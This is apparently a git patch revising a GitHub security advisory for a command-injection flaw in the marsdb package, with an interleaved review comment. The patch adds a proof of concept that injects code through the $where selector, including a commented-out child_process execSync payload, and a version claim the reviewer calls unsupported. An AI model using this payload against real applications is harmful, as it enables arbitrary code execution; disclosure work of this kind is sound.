From 274ff7be4e6335f542822d10160119ec7a7202ad Mon Sep 17 00:00:00 2001
From: Mbl4ck <33488639+msh0625@users.noreply.github.com>
Date: Tue, 9 Jun 2026 10:25:04 +0900
Subject: [PATCH] Improve GHSA-5mrr-rgp6-x4gr

---
 .../GHSA-5mrr-rgp6-x4gr.json | 25 ++++++++++++++-----
 1 file changed, 19 insertions(+), 6 deletions(-)

diff --git a/advisories/github-reviewed/2020/09/GHSA-5mrr-rgp6-x4gr/GHSA-5mrr-rgp6-x4gr.json b/advisories/github-reviewed/2020/09/GHSA-5mrr-rgp6-x4gr/GHSA-5mrr-rgp6-x4gr.json
index d740ffa0b9f3d..c66f5e18ce734 100644
--- a/advisories/github-reviewed/2020/09/GHSA-5mrr-rgp6-x4gr/GHSA-5mrr-rgp6-x4gr.json
+++ b/advisories/github-reviewed/2020/09/GHSA-5mrr-rgp6-x4gr/GHSA-5mrr-rgp6-x4gr.json
@@ -1,12 +1,17 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-5mrr-rgp6-x4gr",
- "modified": "2020-08-31T18:48:01Z",
+ "modified": "2023-01-09T05:03:48Z",
 "published": "2020-09-03T19:39:05Z",
 "aliases": [],
- "summary": "Command Injection in marsdb",
- "details": "All versions of `marsdb` are vulnerable to Command Injection. In the `DocumentMatcher` class, selectors on `$where` clauses are passed to a Function constructor unsanitized. This allows attackers to run arbitrary commands in the system when the function is executed.\n\n\n## Recommendation\n\nNo fix is currently available. Consider using an alternative package until a fix is made available.",
- "severity": [],
+ "summary": "[Security] Arbitrary Code Execution via unsanitized $where selector (GHSA-5mrr-rgp6-x4gr)",
+ "details": "The $where query selector in marsdb passes user-supplied strings directly \nto the Function() constructor without any sanitization or validation.\n\nVulnerable code in dist/DocumentMatcher.js, line 419:\n selectorValue = Function('obj', 'return ' + selectorValue);\n\nThis allows arbitrary JavaScript execution in the application context.\nOn Node.js <= 18 (typical production environments), this escalates to \nfull Remote Code Execution via require('child_process').\n\n## Proof of Concept\n\n```js\nconst Collection = require('marsdb').default;\nconst col = new Collection('users');\ncol.insert({ name: 'alice' });\n\n// Authentication bypass\ncol.find({ $where: \"1 === 1\" }).then(result => {\n console.log('Filter bypassed:', result);\n});\n\n// Full RCE on Node.js <= 18:\n// col.find({\n// $where: \"require('child_process').execSync('whoami').toString()\"\n// });\n```\n\nDiscovered using vulnscope - AI-assisted OSS vulnerability scanner\nhttps://github.com/msh0625/vulnscope",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
+ }
+ ],
 "affected": [
 {
 "package": {
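Review bot: The rewritten `details` line drops the old `## Recommendation` section, so the entry no longer tells a reader what to do, even though the hunk below still models the range with `last_affected` rather than `fixed` and the original guidance therefore still holds; append `\n\n## Recommendation\n\nNo fix is currently available. Consider using an alternative package until a fix is made available.` to the new text. The statement that escalation to RCE happens "On Node.js <= 18" is not supported by anything in the hunk — a string evaluated through `Function()` runs with the application's privileges on any Node.js release — so either cite a source for that boundary or drop the version qualifier. The new `summary` carries a `[Security]` tag and the advisory's own id, both redundant in this database; a plain title such as `Arbitrary code execution via unsanitized $where selector in marsdb` is the house style. The commented-out `child_process` payload in the proof of concept adds nothing the prose does not already state and is better left out of a database entry, and the `Discovered using vulnscope` attribution belongs in the schema's `credits` array rather than in `details`.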
@@ -18,7 +23,10 @@
 "type": "ECOSYSTEM",
 "events": [
 {
- "introduced": "0.0.0"
+ "introduced": "0"
+ },
+ {
+ "last_affected": "0.6.10"
 }
 ]
 }
@@ -30,6 +38,10 @@
 "type": "WEB",
 "url": "https://github.com/bkimminich/juice-shop/issues/1173"
 },
+ {
+ "type": "PACKAGE",
+ "url": "https://github.com/c58/marsdb/blob/master/dist/DocumentMatcher.js"
+ },
 {
 "type": "WEB",
 "url": "https://www.npmjs.com/advisories/1122"
@@ -37,7 +49,8 @@
 ],
 "database_specific": {
 "cwe_ids": [
- "CWE-77"
+ "CWE-77",
+ "CWE-94"
 ],
 "severity": "CRITICAL",
 "github_reviewed": true,